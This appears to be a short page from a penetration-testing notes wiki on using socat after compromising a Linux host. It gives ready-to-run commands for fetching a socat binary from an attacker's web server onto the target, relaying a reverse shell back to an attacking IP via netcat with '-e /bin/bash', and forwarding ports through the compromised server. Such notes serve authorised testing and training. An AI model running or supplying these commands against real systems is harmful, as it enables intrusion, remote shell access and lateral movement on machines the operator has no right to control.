socat

  • socat can be used for stable linux shells and port forwarding

  • before using socat, it will usually be necessary to download a binary and then upload it to the target

    • sudo python3 -m http.server 80

    • then on the target: curl attacking_ip/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME

  • reverse shell relay

    • start a netcat listener on the attacking host

    • sudo nc -lvnp 443

    • then on the target run

    • ./socat tcp-l:8000 tcp:Attacking_IP:443 &

    • then we can create a reverse shell on the newly opened port using netcat

    • ./nc 127.0.0.1 8000 -e /bin/bash

  • port forwarding

    • easy

      • the easiest way is to open up a listening port on the compromised server then redirect anything that comes in to the target serve

      • ./socat tcp-l:33060,fork,reuseaddr tcp:<ip>:<port> &

PreviousplinkNextchisel

Last updated